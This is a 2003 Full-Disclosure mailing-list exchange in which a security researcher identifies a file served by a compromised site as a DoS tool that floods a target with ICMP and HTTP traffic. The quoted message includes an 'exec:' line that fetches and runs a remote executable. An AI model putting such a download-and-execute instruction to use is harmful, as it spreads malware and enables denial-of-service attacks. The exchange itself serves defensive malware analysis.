On Tuesday 25 November 2003 5:17 pm, Steven Harrison wrote: > Just for fun, I pointed my web browser at > http://finance.red-host.com/events.php and all I got back was: > > exec:http://wendy35.phpwebhosting.com/netm.exe > > I retrieved that file, and running it 'strings' does imply that it > will contact a remote website. It could be a copy of the virus (I > have yet to recieve one yet), giving it another way to distribute > itself, or for the author to distribute improved versions.
It's a DoS attack tool, the target of which is the website you see in the strings output. Its only function is to flood the remote host with ICMP and HTTP traffic. -Joe -- Joe Stewart, GCIH Senior Security Researcher LURHQ http://www.lurhq.com/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html